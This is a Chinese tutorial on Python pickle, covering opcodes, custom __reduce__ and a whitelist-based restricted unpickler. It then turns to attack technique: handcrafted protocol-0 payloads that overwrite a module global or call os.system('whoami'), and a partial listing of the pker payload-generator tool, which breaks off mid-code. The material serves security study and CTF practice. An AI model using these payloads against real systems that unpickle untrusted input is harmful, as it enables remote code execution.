Pickle 反序列化

sky123

在 Python 里,pickle 是一个用于 序列化(serialize)反序列化(deserialize) Python 对象的模块。

  • 序列化(pickling):把内存中的 Python 对象转成字节串,方便存盘、传输、缓存
  • 反序列化(unpickling):把字节串还原回等价的 Python 对象

它不仅能保存基础类型(int/str/list/dict),还能处理自定义类实例、函数引用(受限制)、复杂容器等。pickle 是 Python 专用格式,不是跨语言的通用格式。

基本使用

基础用法

Pickle 库提供了下面几种 API 用于序列化和反序列化:

函数 功能 说明
pickle.dump(obj, file, protocol=...) 序列化对象到文件 文件需以 "wb" 打开
pickle.dumps(obj, protocol=...) 序列化对象为 bytes 内存用
pickle.load(file) 从文件反序列化 文件需以 "rb" 打开
pickle.loads(bytes) 从 bytes 反序列化

示例代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import pickle

data = {"name": "Alice", "scores": [98, 87, 92]}

# --- 序列化 ---
b = pickle.dumps(data) # → bytes
with open("data.pkl", "wb") as f:
pickle.dump(data, f)

# --- 反序列化 ---
obj = pickle.loads(b)
with open("data.pkl", "rb") as f:
obj2 = pickle.load(f)

print(obj)
print(obj2)

另外像 pickle.dumps 这种序列化 API 中有一个 protocol 参数可以指定序列化的协议版本。这是因为 Pickle 有多个协议(protocol)版本,数字越大功能越强,性能越好,但可读性和兼容性差。

  • 0:文本格式,最兼容
  • 1:早期二进制协议
  • 2:支持新式类、效率提升
  • 3:Py3 默认,支持 bytes
  • 4:支持大对象、setfronzenset
  • 5:引入 PickleBuffer,支持 out-of-band buffer(零拷贝)

我们可以观察到不同版本协议下序列化的结果是不同的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import pickle

a = {'1': 1, '2': 2}

for i in range(pickle.HIGHEST_PROTOCOL + 1):
print(f'pickle版本{i}', pickle.dumps(a, protocol=i))

"""
pickle版本0 b'(dp0\nV1\np1\nI1\nsV2\np2\nI2\ns.'
pickle版本1 b'}q\x00(X\x01\x00\x00\x001q\x01K\x01X\x01\x00\x00\x002q\x02K\x02u.'
pickle版本2 b'\x80\x02}q\x00(X\x01\x00\x00\x001q\x01K\x01X\x01\x00\x00\x002q\x02K\x02u.'
pickle版本3 b'\x80\x03}q\x00(X\x01\x00\x00\x001q\x01K\x01X\x01\x00\x00\x002q\x02K\x02u.'
pickle版本4 b'\x80\x04\x95\x11\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x011\x94K\x01\x8c\x012\x94K\x02u.'
pickle版本5 b'\x80\x05\x95\x11\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x011\x94K\x01\x8c\x012\x94K\x02u.'
"""

提示

在手动构造 Payload 的时候我们通常选择协议 0,因为这个版本的协议是文本协议,可读性好且兼容性好。

pickletools 模块可以反汇编 pickle 字节流,看它包含哪些 opcode(方便安全审计)。

1
2
3
import pickle, pickletools

pickletools.dis(pickle.dumps({"x": 1}, protocol=0))

自定义序列化

默认的 Pickle 会尝试用“类+构造参数+属性字典”把对象还原,但:

  • 有些类不容易自动还原(例如不可变类型、__slots__、需要构造器参数的对象);
  • 你可能想压缩/脱敏/裁剪状态,或做版本迁移
  • 你想明确控制“反序列化时调用哪个函数,用哪些参数,然后如何恢复属性”。

因此 Pickle 提供了类的魔术方法可以支持自定义的序列化/反序列化。

reduce / reduce_ex

__reduce__ / __reduce_ex__(protocol) 这两个方法告诉 pickle:“如何重建我”。它们需要返回一个 tuple,基本形态:

1
(callable, args_tuple[, state[, listitems[, dictitems]]])

最常见的是前两位或前三位:

  • callable:反序列化时要被调用的可调用对象,通常是类的构造函数,或者你定义的一个工厂函数。
  • args_tuple:传给 callable 的参数元组,这些参数将用于重新构造对象。
  • state(可选):对象的额外状态(通常是一个属性字典),用来恢复对象的内部状态。

如果实现了 __reduce__ 魔术方法,则 Pickle 反序列化等价于:

1
2
3
4
obj = callable(*args_tuple)
# 如果提供了 state:
obj.__setstate__(state) # 若存在
# 否则尝试 obj.__dict__.update(state)
  1. callable(*args_tuple) :在反序列化时,pickle 会调用 callable(*args_tuple) 来创建一个新的对象。这个 callable 通常是类本身,而 args_tuple 是传给该类构造函数的参数。所以,反序列化实际上是通过类和构造函数参数来重建对象

  2. 恢复 state :如果 __reduce__ 返回了一个 state(通常是一个字典),那么在创建好对象后,pickle 会尝试恢复对象的状态:

    • 如果对象实现了 __setstate__(state) 方法,pickle 会调用该方法,这是常见的恢复对象状态的方式。

      1
      obj.__setstate__(state)
    • 如果没有 __setstate__ 方法,pickle 会通过 obj.__dict__.update(state) 来手动更新对象的属性字典,从而恢复状态。

    这里的 state 主要是对象的内部属性,例如 self.__dict__,通常在序列化时提取,或者是自定义的状态数据。

提示

  • _reduce_ex__(protocol)__reduce__ 优先。如果类实现了 __reduce_ex__,那么 pickle 会优先调用它;如果没有实现 __reduce_ex__,则会回退到调用 __reduce__

  • Pickle 序列化时将 __reduce__ 返回的元组(通常是 (callable, args_tuple))写入数据流,反序列化时根据这个元组调用 callable(*args_tuple) 来重建对象。这样,pickle 在反序列化时更具灵活性,但也带来了潜在的安全风险,因为它不仅还原数据,还可能执行某些逻辑。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    import pickle
    import os

    # 自定义类,定义 __reduce__ 方法
    class CommandExecutor:
    def __init__(self, command):
    self.command = command

    def __reduce__(self):
    # 返回值是 (callable, args_tuple),会在反序列化时调用
    return (os.system, (self.command,)) # os.system 执行命令

    # 创建 CommandExecutor 对象
    obj = CommandExecutor("echo 'Hello, World!'")

    # 序列化对象
    serialized_obj = pickle.dumps(obj)

    # 反序列化对象并执行命令
    pickle.loads(serialized_obj)

getstate / setstate

__getstate____setstate__ 是另外两个方法,它们用于导出和恢复对象的内部状态

  • __getstate__:序列化时调用,返回对象的状态(通常是属性字典)。
  • __setstate__:反序列化时调用,用来恢复对象的状态。

例如,我们可以在 __getstate__ 中对对象进行一些处理,过滤掉不必要的数据,或对数据进行压缩。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
class MyClass:
def __init__(self, x, y, secret_data):
self.x = x
self.y = y
self.secret_data = secret_data

def __getstate__(self):
# 返回需要序列化的属性字典,去除 'secret_data'
state = self.__dict__.copy()
del state['secret_data']
return state

def __setstate__(self, state):
# 恢复对象的属性
self.__dict__.update(state)

obj = MyClass(10, 20, "secret")
serialized_obj = pickle.dumps(obj)
deserialized_obj = pickle.loads(serialized_obj)

print(deserialized_obj.x) # 输出 10
print(deserialized_obj.y) # 输出 20
# print(deserialized_obj.secret_data) # 会抛出 AttributeError

提示

  • __reduce__ 是与对象的序列化过程相关,它返回一个“配方”(如 (callable, args_tuple)),这个配方会在 序列化时 写进字节流,并且 反序列化时 被用来恢复对象。

  • __getstate____setstate__ 只与对象的状态有关,它们不涉及对象的构建过程,而是直接导出和恢复对象的状态(例如属性、字段等)。

限制对象加载

在反序列化时,pickle 遇到某些指令(如 GLOBALSTACK_GLOBAL)时,需要按模块名 + 对象名去加载一个全局对象,比如:

  • GLOBAL(协议 0,c
  • STACK_GLOBAL(协议 4,\x93
  • REDUCE(间接触发,R

这一步是通过 Unpickler.find_class(module, name) 方法完成的。默认实现会直接导入对应模块并取出对象——这也是攻击者可利用的执行点。

1
2
3
def find_class(self, module, name):
__import__(module)
return getattr(sys.modules[module], name)

为了降低风险,可以继承 pickle.Unpickler重写 find_class,在里面做白名单检查:

  • 只允许加载你指定的安全对象(如 builtins.range 等);
  • 其余一律抛出 UnpicklingError 阻止执行。

注意

:基础类型(intlistdict 等)在反序列化时并不会走 find_class,它们由专用的 pickle 指令处理,所以不会被白名单逻辑拦截。这种限制方法只影响“按名加载”的对象(即类、函数等可全局引用的对象)。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import builtins, io, pickle

# 允许按“模块名+对象名”加载的内建对象白名单
# ⚠️ 仅影响会触发 find_class 的对象(类/函数等),
# 不影响 int/list/dict 等基础类型的反序列化。
safe = {"range", "complex", "set"}

class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
# 仅允许加载 builtins 中在 safe 白名单里的对象
if module == "builtins" and name in safe:
return getattr(builtins, name)
# 其余“按名加载”的对象全部禁止
raise pickle.UnpicklingError(f"Global '{module}.{name}' is forbidden")

# 受限反序列化 helper:只对白名单对象生效
def restricted_loads(s: bytes):
return RestrictedUnpickler(io.BytesIO(s)).load()

# 序列化:包含基础类型 int、list 以及会触发 find_class 的 builtins.range
data = pickle.dumps([1, 2, range(10)])

# 反序列化说明:
# - 1、2、以及外层 list 使用专用 opcode,不会触发 find_class,正常恢复
# - range 会触发 find_class,因在白名单内 → 允许
try:
obj = restricted_loads(data)
print(obj) # 这里会成功打印,而不是报错
except pickle.UnpicklingError as e:
print(f"Unpickling Error: {e}")

提示

pickle.Unpickler 需要一个“类文件对象”来读取 pickle 流。

io.BytesIO 会把 bytes 类型(二进制)的 pickle 数据包装成一个内存文件对象,就像用 open() 打开的文件一样可以被读取,只是数据在内存中,不在磁盘里。

load()Unpickler 的方法,会开始从传入的文件对象读取 pickle 数据,逐条解释指令,创建对象,最后返回反序列化结果。

Pickle 字节码

反序列化原理

pickle 的序列化结果是指令流(opcode + 参数),反序列化就是一条条解释执行这些指令。其中会涉及到如下概念:

  • 数据栈(stack):用于临时存放构造中的对象、参数等。
  • 标记(MARK):用来圈定一段栈内容,之后用来打包成 list/tuple/dict 或函数参数。
  • 备忘录(memo):一个索引 → 对象 的字典,用于保存已创建对象,解决重复引用循环引用
  • 构造路径:简单对象直接压栈,复杂对象通过 GLOBAL/REDUCE/BUILD 等组合指令构造。

pickle 反序列化的大致流程如下:

  1. 初始化 Unpickler
    • 反序列化入口是 pickle.Unpickler(file_like).load()
    • 这个对象持有:
      • 文件流(pickle 数据源,可以是 BytesIO 内存文件)
      • 数据栈
      • memo
      • find_class 方法(可重写来做白名单)
  2. 逐字节读取指令
    • 从 pickle 数据流中读取一个字节(opcode)。
    • 根据 opcode 类型,可能需要继续读取参数(文本或二进制)。
  3. 执行指令
    • 如果是常量(NONEINTSTRING 等)→ 直接构造对象压栈。
    • 如果是容器(LISTDICTTUPLE 等)→ 从最近 MARK 后的栈元素收集打包。
    • 如果是 GLOBAL → 调用 find_class(module, name) 取出全局对象(通常是类/函数)。
    • 如果是 REDUCE → 从栈取 (callable, args_tuple),执行 callable(*args),结果压栈。
    • 如果是 BUILD → 恢复对象状态(__setstate____dict__.update)。
    • 如果是 PUT/GET → 在 memo 中存取对象引用。
  4. 遇到 STOP
    • 返回栈顶对象作为反序列化结果。

字节码指令

下面只介绍pickle 协议 0(protocol 0)的指令集。它是最早的纯 ASCII 文本协议:所有参数用可读文本表示并以换行结尾,解释器像“栈机器”一样按指令对栈做操作,并用一个备忘录(memo)表来处理共享/循环引用。

栈与流程控制指令

指令名 字符 作用 参数形式 栈操作示例
MARK ( 压入标记对象,用于收集一段元素 [...] → [..., ⟂]
STOP . 结束 pickle,返回栈顶对象 [obj] → return obj
POP 0 弹出一个栈顶元素 [..., x] → [...]
POP_MARK 1 回退到最近的 MARK(把该 MARK 也弹掉) [..., ⟂, a, b] → [...]
DUP 2 复制栈顶元素 [..., x] → [..., x, x]

常量与标量(文本编码)

指令名 字符 作用 参数形式 栈操作示例
NONE N 压入 None [...] → [..., None]
INT I 压入十进制整数或布尔 I42\n / I01\n / I00\n [...] → [..., 42]
LONG L 压入大整数(文本十进制) L1234567890\n [...] → [..., big_int]
FLOAT F 压入浮点数(文本十进制) F3.14\n [...] → [..., 3.14]
STRING S 压入字节串/文本的旧式表示,参数是 Python repr 风格(带引号、转义,换行结尾) S'abc'\n [...] → [..., b'abc']
UNICODE V 压入 Unicode 文本,参数是 raw-unicode-escape 编码 Vabc\n [...] → [..., "abc"]

容器构造指令

列表构造指令:

指令名 字符 作用 参数形式 栈操作示例
EMPTY_LIST ] 压入空列表 [...] → [..., []]
LIST l 把从最近 MARK 之后的元素收集成 list [..., ⟂, a, b] → [..., [a, b]]
APPEND a 把栈顶 x 追加到其下方的 list [..., L, x] → [..., L+[x]]
APPENDS e MARK 之后的连续元素批量追加到其下方的 list [..., L, ⟂, a, b] → [..., L+[a, b]]

元组构造指令:

指令名 字符 作用 参数形式 栈操作示例
EMPTY_TUPLE ) 压入空元组 [...] → [..., ()]
TUPLE t MARK 之后的元素收集成 tuple [..., ⟂, a, b] → [..., (a, b)]

字典构造指令:

指令名 字符 作用 参数形式 栈操作示例
EMPTY_DICT } 压入空字典 [...] → [..., {}]
DICT d MARK 之后按 k1, v1, k2, v2, … 的顺序收集成 dict [..., ⟂, k1, v1, k2, v2] → [..., {k1:v1, k2:v2}]
SETITEM s 把顶上两项作为 key, value 设置到其下方的 dict `[…, D, k, v] → […, D
SETITEMS u MARK 之后的若干对 (k, v) 批量设置进其下方的 dict `[…, D, ⟂, k1, v1, k2, v2] → […, D

备忘录(memo)指令

指令名 字符 作用 参数形式 栈操作示例
PUT p 将栈顶对象存入备忘录(文本索引) p0\n memo[0] = top
GET g 从备忘录取对象压栈(文本索引) g0\n push(memo[0])

对象构造与执行

指令名 字符 作用 参数形式 栈操作示例
GLOBAL c 按模块+名称加载全局对象 "module\nname\n" [...] → [..., find_class(module, name)]
REDUCE R 调用可调用对象构造新对象 [..., callable, args_tuple] → [..., callable(*args_tuple)]
INST i 老式类实例化(MARK 收集参数) "module\nname\n" [..., ⟂, arg1, arg2, ...] → [..., find_class(module, name)(arg1, arg2, ...)]
OBJ o 老式实例构造(MARK 收集参数) [..., ⟂, callable, arg1, arg2, ...] → [..., callable(arg1, arg2, ...)]
BUILD b 恢复对象状态 [..., obj, state] → [..., obj](对象状态已更新)

持久化钩子

指令名 字符 作用 参数形式 栈操作示例
PERSID P 通过 persistent_load 加载对象 pid\n 文本持久化 ID交给 Unpickler.persistent_load(pid) 来解析成对象并压栈

常见情景

覆盖全局变量

以这段代码为例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# secret.py
name = 'TEST3213qkfsmfo'

# main.py
import pickle, secret

opcode = '''c__main__
secret
(S'name'
S'1'
db.'''

print('before:', secret.name)
output = pickle.loads(opcode.encode())
print('after:', secret.name)

执行过程为:

  • c__main__\nsecret\nGLOBAL: 调用 find_class("__main__", "secret"),把 __main__ 模块中名为 secret 的全局对象 压栈。
    ⚠️ 这要求在 main.py 里,确实存在一个名为 secret 的全局对象(这里因为 import secret__main__ 的全局命名空间里就有个名字 secret 指向那个模块对象)。
  • (MARK:打标记,准备“收集一段元素”。
  • S'name'\n S'1'\n d → 依次把 'name''1' 压栈,然后 dDICT)把 MARK 后的元素收集成字典:{'name': '1'}
  • bBUILD:对栈下方那个对象(也就是第一步拿到的 secret 模块对象)执行状态恢复
    • 如果对象定义了 __setstate__ 就调用它;
    • 否则执行 obj.__dict__.update(state)
      因为模块对象有 __dict__,于是相当于:secret.__dict__.update({'name': '1'}),从而**覆盖了模块变量 secret.name**。
  • .STOP:结束。

对应的栈变化为:

1
2
3
4
5
6
7
8
[]  
→ [ secret_module ] # c__main__ secret
→ [ secret_module, ⟂ ] # (
→ [ secret_module, ⟂, 'name' ] # S'name'
→ [ secret_module, ⟂, 'name', '1' ] # S'1'
→ [ secret_module, {'name': '1'} ] # d (DICT) 收集成字典
→ [ secret_module ] # b (BUILD) 修改 __dict__ 覆盖 name='1'
return secret_module # .

结果:secret.name 从原值被改为 '1'

函数调用

REDUCE (R) 路径

1
2
3
4
b'''cos
system
(S'whoami'
tR.'''

执行过程为:

  • c os\n system\nGLOBAL:压入 os.system 这个可调用对象。
  • ( S'whoami'\n tMARK+参数+TUPLE:把 'whoami' 打成参数元组 ('whoami',)
  • RREDUCE:执行 os.system('whoami'),把返回值(命令退出码)压栈。
  • . → 结束、返回退出码。

对应的栈变化为:

1
2
3
4
5
6
7
[]  
→ [ os.system ] # c os system
→ [ os.system, ⟂ ] # (
→ [ os.system, ⟂, 'whoami' ] # S'whoami'
→ [ os.system, ('whoami',) ] # t (TUPLE)
→ [ os.system('whoami') ] # R (REDUCE)
return result_of_system # .

INST (i) 路径

1
2
3
4
b'''(S'whoami'
ios
system
.'''

执行过程为:

  • ( S'whoami'\n → 压入 MARK'whoami' 作为参数。
  • i os\n system\nINST:老式“构造实例”指令,会把栈上从 MARK 开始的元素作为参数,调用 指定模块名与对象名 指向的可调用对象。
    这实际上会调用 os.system('whoami'),虽然这个指令名看起来像“实例化类”,但底层就是调用可调用对象(当年主要用于旧式类)。
  • . → 返回。

对应的栈变化为:

1
2
3
4
5
[]  
→ [ ⟂ ] # (
→ [ ⟂, 'whoami' ] # S'whoami'
→ [ os.system('whoami') ] # i os system
return result_of_system # .

OBJ (o) 路径

1
2
3
4
b'''(cos
system
S'whoami'
o.'''

执行过程为:

  • ( 压入 MARK
  • c os\n system\n → 把 os.system 压栈
  • S'whoami'\n → 压入参数
  • oOBJ:使用 MARK 后的内容作为参数调用栈中的“类/可调用对象”,得到结果压栈(历史上用于“构造类实例”,本质还是“调用”)。
  • . → 返回

对应的栈变化为:

1
2
3
4
5
6
[]  
→ [ ⟂ ] # (
→ [ ⟂, os.system ] # c os system
→ [ ⟂, os.system, 'whoami' ] # S'whoami'
→ [ os.system('whoami') ] # o (OBJ)
return result_of_system # .

实例化对象

1
2
3
4
5
6
7
8
9
10
11
12
13
class Student:
def __init__(self, name, age):
self.name = name
self.age = age

data = b'''c__main__
Student
(S'XiaoMing'
S'20'
tR.'''

a = pickle.loads(data)
print(a.name, a.age) # XiaoMing 20

执行过程为:

  • GLOBAL "__main__"\n "Student"\n → 压入 Student 构造器;
  • ( + S'XiaoMing' + S'20' + t → 参数元组 ('XiaoMing', '20')
  • R → 调用 Student('XiaoMing', '20')
  • . → 返回实例。

对应的栈变化为:

1
2
3
4
5
6
7
8
[]  
→ [ Student ] # c__main__ Student
→ [ Student, ⟂ ] # (
→ [ Student, ⟂, 'XiaoMing' ] # S'XiaoMing'
→ [ Student, ⟂, 'XiaoMing', '20' ] # S'20'
→ [ Student, ('XiaoMing', '20') ] # t (TUPLE)
→ [ Student('XiaoMing', '20') ] # R (REDUCE)
return student_instance # .

pker 编写字节码

pker 是一个安全研究工具,可将受限子集的 Python 源码直接转换为 Pickle 协议 0(文本)指令串
它主要用于构造 Pickle 反序列化的 payload,在安全测试、CTF 中快速生成协议 0 的可执行 pickle 数据,而无需手写复杂的 opcode。

工具代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
# -*- coding: utf-8 -*-
import ast

# 内置“宏”集合:解析到这些标识符时,进入专门的宏翻译逻辑
BUILTIN_MACROS = (
'GLOBAL', # 生成 GLOBAL opcode:c{module}\n{name}\n
'INST', # 生成 INST opcode(老式构造)
'OBJ', # 生成 OBJ opcode:调用可调用对象
)


# ========== 基础工具:AST -> Python 值(或保留节点) ==========

def _is_num_node(node):
"""兼容旧版 ast.Num / 新版 ast.Constant(int/float/bool)"""
return isinstance(node, ast.Num) or (isinstance(node, ast.Constant) and isinstance(node.value, (int, float)))


def _is_str_node(node):
"""兼容旧版 ast.Str / 新版 ast.Constant(str)"""
return isinstance(node, ast.Str) or (isinstance(node, ast.Constant) and isinstance(node.value, str))


def extract_value(node):
"""
将 AST 节点抽取为 Python 的原生值(int/float/str/list/tuple/dict/...)。
不可直接抽取(如 ast.Call / ast.Name)则原样返回,由后续生成器处理。
"""
# 数字(int/float)
if _is_num_node(node):
return node.n if isinstance(node, ast.Num) else node.value

# 字符串
if _is_str_node(node):
return node.s if isinstance(node, ast.Str) else node.value

# None / True / False / 其他 literal
if isinstance(node, ast.Constant):
return node.value

# 列表
if isinstance(node, ast.List):
return [extract_value(elt) for elt in node.elts]

# 元组
if isinstance(node, ast.Tuple):
return tuple(extract_value(elt) for elt in node.elts)

# 字典(修复:用 zip 一一配对)
if isinstance(node, ast.Dict):
return {
extract_value(k): extract_value(v)
for k, v in zip(node.keys, node.values)
}

# 读下标不支持,给出替代建议
if isinstance(node, ast.Subscript):
raise Exception("Subscript read like x['k'] is not supported. "
"Use a method call form (e.g., dict.get(x, 'k') via calls) "
"or rewrite to a supported sequence (e.g., use SETITEM-only tricks).")

# 其他类型(如 ast.Call, ast.Name, ast.Attribute 等):保留节点对象
return node


# ========== Python 值/节点 -> 协议0 文本指令 ==========

def cons_basic_type(v):
"""
将基础值或部分 AST 节点翻译为 protocol 0 文本指令片段。
"""
if isinstance(v, str):
return cons_str(v) # S'...'\n
if isinstance(v, (int, float)):
return cons_num(v) # I...\n / F...\n
if isinstance(v, list):
return cons_lst(v) # ( ... l
if isinstance(v, tuple):
return cons_tpl(v) # ( ... t
if isinstance(v, dict):
return cons_dct(v) # ( k v k v ... d

# 兼容“已经是 Python None”的情况(非 AST 节点)
if v is None:
return 'N'

# 还未抽取/需要递归处理的 AST 节点
if isinstance(v, ast.Call):
return cons_invoke(v)
if isinstance(v, ast.Name):
return cons_defined_var(v.id)
if isinstance(v, ast.Constant) and v.value is None:
return 'N' # None -> N

# 兜底:一般不会走到
return v


def cons_str(s):
"""
字符串常量:S'...'\n
协议0要求使用单引号包裹并进行必要转义。
"""
s = s.replace('\\', '\\\\').replace("'", "\\'")
return f"S'{s}'\n"


def cons_num(n):
"""
数字常量(协议0):
int -> I{int}\n
float -> F{float}\n (按 str(n) 输出,避免科学计数法差异)
"""
if isinstance(n, int):
return f'I{n}\n'
if isinstance(n, float):
return f'F{n}\n'
raise TypeError(f'cons_num only accepts int/float, got {type(n).__name__}')


def cons_lst(lst):
"""
列表:
'(' 打 MARK
依次 push 各元素
'l' 结束 -> LIST
"""
buf = ['(']
for cell in lst:
buf.append(cons_basic_type(cell))
buf.append('l')
return ''.join(buf)


def cons_tpl(tpl):
"""
元组:
'(' 打 MARK
依次 push 各元素
't' 结束 -> TUPLE
"""
buf = ['(']
for cell in tpl:
buf.append(cons_basic_type(cell))
buf.append('t')
return ''.join(buf)


def cons_dct(dct):
"""
字典:
'(' 打 MARK
依次 push k、v
'd' 结束 -> DICT
"""
buf = ['(']
for k, v in dct.items():
buf.append(cons_basic_type(k))
buf.append(cons_basic_type(v))
buf.append('d')
return ''.join(buf)


# ========== 赋值构造(下标/属性/变量引用) ==========

def cons_item_assign(obj_name, item_k, item_v):
"""
下标赋值: obj[item_k] = item_v
gN -> 取 obj
<k> -> push key
<v> -> push value
's' -> SETITEM
"""
return ''.join((
cons_defined_var(obj_name),
cons_basic_type(extract_value(item_k)),
cons_basic_type(extract_value(item_v)),
's',
))


def cons_defined_var(varname):
"""
引用已定义变量:通过 memo 索引生成 g{idx}\n
"""
return f'g{lookup_memo(varname)}\n'


def cons_attr_assign(obj_name, attr_k, attr_v):
"""
属性赋值: obj.attr_k = attr_v
采用:对象在栈顶 + 使用 BUILD 的常见技巧
gN 取对象
'(}(' MARK + EMPTY_DICT + MARK
S'attr'\n push key
<value> push value
'd' DICT
't' TUPLE
'b' BUILD (以 dict 更新对象状态/属性;具体效果依赖对象类型实现)
"""
return ''.join((
cons_defined_var(obj_name),
'(}(',
f"S'{attr_k}'\n",
cons_basic_type(extract_value(attr_v)),
'dtb',
))


# ========== 宏(GLOBAL / INST / OBJ) ==========

def cons_builtin_macros(macro_name, args):
"""
将内置宏翻译为协议0文本指令:
- GLOBAL(mod, name)
-> 'c' + mod + '\n' + name + '\n'
- INST(mod, name, *ctor_args)
-> '(' + <ctor_args> + 'i' + mod + '\n' + name + '\n'
- OBJ(callable, *call_args)
-> '(' + <callable> + <call_args> + 'o'
"""
buf = []
if macro_name == 'GLOBAL':
if len(args) != 2:
raise Exception(f"Macro `GLOBAL` takes 2 arguments but {len(args)} was given")
mod, name = args
if not isinstance(mod, str) or not isinstance(name, str):
raise Exception("Macro `GLOBAL` requires string arguments")
buf.append('c')
buf.append(mod + '\n')
buf.append(name + '\n')

elif macro_name == 'INST':
if len(args) < 2:
raise Exception("Macro `INST` takes at least 2 arguments")
mod, name, *ctor_args = args
if not isinstance(mod, str) or not isinstance(name, str):
raise Exception("Macro `INST` requires the first 2 arguments to be strings")
buf.append('(')
for a in ctor_args:
buf.append(cons_basic_type(a))
buf.append('i')
buf.append(mod + '\n')
buf.append(name + '\n')

elif macro_name == 'OBJ':
if len(args) < 1:
raise Exception("Macro `OBJ` takes at least 1 argument")
callable_obj, *call_args = args
buf.append('(')
# 第一个参数可为:
# - ast.Name:引用已有变量(gN)
# - ast.Call:通常是 GLOBAL(...) 之类的宏调用
if isinstance(callable_obj, ast.Name):
buf.append(cons_defined_var(callable_obj.id))
elif isinstance(callable_obj, ast.Call):
if not isinstance(callable_obj.func, ast.Name) or callable_obj.func.id not in BUILTIN_MACROS:
raise Exception("OBJ's callable must be a Name or a builtin macro Call")
buf.append(
cons_builtin_macros(
callable_obj.func.id,
[extract_value(a) for a in callable_obj.args]
)
)
else:
# 也允许直接给 Python 值(比如前序赋值保存的对象再取出)
buf.append(cons_basic_type(callable_obj))

for a in call_args:
buf.append(cons_basic_type(a))
buf.append('o')

else:
raise Exception(f'Unknown builtin macro: {macro_name}')

return ''.join(buf)


# ========== 函数调用(普通/嵌套) ==========

def cons_func(fn_name, args):
"""
普通函数调用:
gN 取函数对象
'('... 压入参数
'tR' 打包元组 + REDUCE(相当于调用 callable(*args))
"""
return cons_defined_var(fn_name) + cons_args(args)


def cons_args(args):
"""
将位置参数封装为: '(' + <args...> + 'tR'
'(' -> MARK
't' -> TUPLE(把自 MARK 以来的对象打包成 tuple)
'R' -> REDUCE(对 (callable, args_tuple) 执行调用/构造)
"""
parts = ['(']
parts += [cons_basic_type(arg) for arg in args]
parts.append('tR')
return ''.join(parts)


def cons_invoke(node):
"""
处理 ast.Call:
- 如果是宏(Name 且在 BUILTIN_MACROS),走 cons_builtin_macros
- 如果是普通名字,走 cons_func
- 如果是嵌套调用(func 本身是 Call),先生成外层 callable,再接上当前参数
"""
args = [extract_value(arg) for arg in node.args]

# f(...) :f 是名字
if isinstance(node.func, ast.Name):
fn_name = node.func.id
if fn_name in BUILTIN_MACROS:
return cons_builtin_macros(fn_name, args)
return cons_func(fn_name, args)

# (g(...))(...): func 本身是调用表达式,递归展开
if isinstance(node.func, ast.Call):
return cons_invoke(node.func) + cons_args(args)

# 其他情况(极少):尝试按值处理
return cons_basic_type(node)


# ========== 状态机:维护 memo/输出缓冲/语义翻译 ==========

class Pickler:
"""
生成 pickle 协议0 文本指令的核心类。
- self._context: 变量名 -> memo 索引
- self._memo_index: 下一个可用 memo 槽位
- self._output: 输出缓冲(字符串片段)
"""

def __init__(self):
self._context = {}
self._memo_index = 0
self._output = []
# 给 cons_defined_var 用:全局注册 lookup_memo(保持原项目风格)
globals()['lookup_memo'] = self.lookup_memo

def __setitem__(self, key, value):
"""
处理赋值:
- x = expr -> 保存 expr 到 memo(p{idx}\n),并记录 x 对应 idx
- x[i] = expr -> 生成 SETITEM
- x.attr = expr -> 生成 BUILD/属性写入
"""
if isinstance(key, ast.Name):
if key.id in BUILTIN_MACROS:
raise Exception(f"Can't assign to built-in macro `{key.id}`")
self._context[key.id] = self._memo_index
# RHS 先入栈,再 PUT 到 memo(保持原版风格:p{idx}\n0)
self.push(cons_basic_type(extract_value(value)) + self.gen_memo())

elif isinstance(key, ast.Subscript):
# 仅支持 x[<const>] 形态
if not isinstance(key.value, ast.Name):
raise Exception("Left side of subscript assignment must be a Name")
# slice 在 3.9+ 为 ast.Constant/ast.Slice 等;此处仅处理常量下标
sl = key.slice.value if isinstance(key.slice, ast.Index) else key.slice
self.push(cons_item_assign(key.value.id, sl, value))

elif isinstance(key, ast.Attribute):
# 仅支持 x.attr(x 必须是名字)
